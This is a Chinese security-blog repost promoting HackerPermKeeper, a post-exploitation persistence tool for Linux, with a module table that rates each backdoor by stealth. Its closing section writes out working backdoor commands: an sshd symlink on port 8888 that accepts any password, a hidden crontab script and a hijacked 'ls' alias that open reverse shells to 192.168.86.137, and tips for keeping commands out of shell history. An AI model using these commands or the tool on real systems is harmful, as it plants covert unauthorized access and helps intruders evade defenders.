【神兵利器】后渗透-权限维持工具之HackerPermKeeper

admin 2024年3月5日20:35:33评论19 views字数 3532阅读11分46秒阅读模式

🔒HackerPermKeeper-黑客权限保持者

  _    _            _             _____                    _  __                          | |  | |          | |           |  __                   | |/ /                         | |__| | __ _  ___| | _____ _ __| |__) |__ _ __ _ __ ___ | ' / ___  ___ _ __   ___ _ __  |  __  |/ _` |/ __| |/ _  '__|  ___/ _  '__| '_ ` _ |  < / _ / _  '_  / _  '__| | |  | | (_| | (__|   <  __/ |  | |  |  __/ |  | | | | | | .   __/  __/ |_) |  __/ |    |_|  |_|__,_|___|_|____|_|  |_|   ___|_|  |_| |_| |_|_|____|___| .__/ ___|_|                                                                           | |                                                                                      |_|

        通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]

【神兵利器】后渗透-权限维持工具之HackerPermKeeper

🚀上手指南

📢 有助于你快速熟悉HackerPermKeeper

🔒支持系统列表

🔒权限维持模块 centos Ubuntu 推荐指数 需要权限 备注 py2 py3
OpenSSH后门万能密码&记录密码 ✔️ root 此后门需要很老的内核版本,而且需要很多依赖环境 ✔️
PAM后门 此后门需要很老的内核版本,而且需要很多依赖环境
ssh软链接 ✔️ ✔️ ⭐⭐ root 容易被发现 ✔️ ✔️
ssh公私密钥 ✔️ ✔️ ⭐⭐⭐⭐⭐ User 发现程度很难,参考了挖矿病毒 ✔️ ✔️
后门帐号 ✔️ ✔️ ⭐⭐⭐ root 用命令添加账户,不会创建用户home目录[有一个是直接指向root目录] ✔️ ✔️
crontab计划任务 ✔️ ✔️ ⭐⭐⭐⭐ User or root 难以发现,通过执行计划任务 ✔️ ✔️
Strace后门 ✔️ ✔️ ⭐⭐ root 键盘记录的后门 ✔️ ✔️
Alias后门 ✔️ ✔️ ⭐⭐⭐⭐ root 别名后门,难以发现,但是需要用户去执行命令 ✔️ ✔️
Rootkit后门[检测] ⭐⭐⭐ root 难以发现,但是安装复杂,而且指定内核版本
临时history不记录命令 or 永久不记录命令 ✔️ ✔️ ⭐⭐⭐⭐⭐⭐ root 有的服务器设置了空格记录执行命令,执行这个脚本快速设置不记录空格命令 ✔️ ✔️
ssh软链接&crontab ✔️ ✔️ ⭐⭐⭐⭐ root 快速生成软链接,并且执行计划任务,每分钟判断当前软链接是否存在,如果被kill掉,就重新执行 ✔️ ✔️
check.py ✔️ ✔️ ⭐⭐⭐⭐⭐⭐ User 快速检测目标机器可以使用那个权限维持模块,并且检测当前机器处于docker还是k8s,并检测docker逃逸 ✔️ ✔️
sshkey密钥&crontab ✔️ ✔️ ⭐⭐⭐⭐⭐⭐ User or root 快速生成ssh密钥,并且执行计划任务,每分钟判断当前密钥和多个文件是否存在,如果被kill掉,就重新执行 ✔️ ✔️
php权限维持不死免杀马 ✔️ ✔️ ⭐⭐⭐⭐⭐⭐ User or root phpweb权限维持马 ✔️ ✔️
Suid shell bash ✔️ ✔️ ⭐⭐⭐⭐⭐ root Suid shell bash脚本(低权限用户运行),可以和webshell进行联动一个低权限用户只需要执行一个文件就可以获取高权限 ✔️ ✔️
BT面板后渗透[bt_T00ls_v7.0]内部版 ✔️ ✔️ ⭐⭐⭐⭐⭐ root BT面板后渗透【bt_T00ls_v7.0】内部版 ✔️ ✔️

🔐权限的划分

UID 数值 比如:
0 超级管理员(root用户) root
1~999 Linux系统将一些服务程序和系统任务分配给独立的系统用户来运行 bin
1000 普通用户UID从1000开始 www-data,www

🐍安装要求

python3运行此项目[我自己的环境是Python 3.9.7],但是运行权限维持模块脚本请看上面的表格安装依赖pip install -r requirements.txt

【神兵利器】后渗透-权限维持工具之HackerPermKeeper

测试是否正常运行

python main.py -h

【神兵利器】后渗透-权限维持工具之HackerPermKeeper

✨使用演示

python main.py -h

【神兵利器】后渗透-权限维持工具之HackerPermKeeper

快速判断目标机器适合的权限维持模块,运行 /check/ 目录下的check.py文件[这个不需要任何依赖环境,python3和python2都支持]python check.pypython3 check.pypython2 check.py

【神兵利器】后渗透-权限维持工具之HackerPermKeeper

查看权限维持模块信息

python main.py -c 1

【神兵利器】后渗透-权限维持工具之HackerPermKeeper

查看权限维持模详细块信息

python main.py -c 2

【神兵利器】后渗透-权限维持工具之HackerPermKeeper

使用此项目生成权限维持脚本[在这之前,请先运行check.py脚本判断出目标机器适合什么类型权限维持的脚本]

python main.py -m 1   #选择模块[6.0更新之后,可以连续选择]

【神兵利器】后渗透-权限维持工具之HackerPermKeeper

有的生成的脚本文件。需要在生成之后进行手动修改比如:修改反弹shellip以及端口,后门用户密码,ssh密钥密码,ssh密钥等[此缺陷将会在第二个版本修复]生成的文件会在payloads目录下产生

【神兵利器】后渗透-权限维持工具之HackerPermKeeper

🚩下载

https://github.com/RuoJi6/HackerPermKeeper

OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用发现程度:||PAM后门,PAM是一个Linux登录验证的认证服务,修改其中关于ssh登录的验证,添加一个万能密码,已经记录的账号密码位置(类似把对方房间内有内鬼)发现程度:||SSH软链接cat /etc/ssh/sshd_config|grep UsePAMln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888ssh [email protected] -p 8888 任意密码登录即可发现程度:||||||公私钥使用密钥进行登录发现程度:||||||后门帐号使用命令添加账号发现程度:||||||crontab后计划任务1、编辑后门反弹vim /etc/.111.sh#!/bin/bashsh -i >& /dev/tcp/192.168.86.137/3434 0>&1chmod +x /etc/.111.sh2、添加定时任务vim /etc/crontab*/1 * * * * root /etc/.1111.sh发现程度:||||||Strace后门strace是一个动态跟踪工具,它可以跟踪系统调用的执行。我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围可以记录ssh明文和密钥(登录的)和Rootkit配合一起发现程度:||||命令自定义-Alias后门alias命令的功能:为命令设置别名alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.86.137/3333 0>&1; };alerts'执行ls就会反弹shell持久化+隐藏:重启依旧生效发现程度:||||Rootkit后门https://github.com/f0rb1dd3n/Reptile/releases/Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。发现程度:||但是使用工具进行检测出来情况很大,建议看代码,手动编写此工具(难度很大)history不记录执行命令在输入命令时候,添加空格ssh软链接&crontab快速生成软链接[需要运行脚本成功后,一分钟连接],并且执行计划任务,每分钟判断当前软链接是否存在,如果被kill掉,就重新执行|||||  越多,越容易发发现||        越少,越难发现,但是部署起来,需要的依赖很多

原文始发于微信公众号(渗透测试):【神兵利器】后渗透-权限维持工具之HackerPermKeeper

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月5日20:35:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【神兵利器】后渗透-权限维持工具之HackerPermKeeperhttp://cn-sec.com/archives/2549172.html

发表评论

匿名网友 填写信息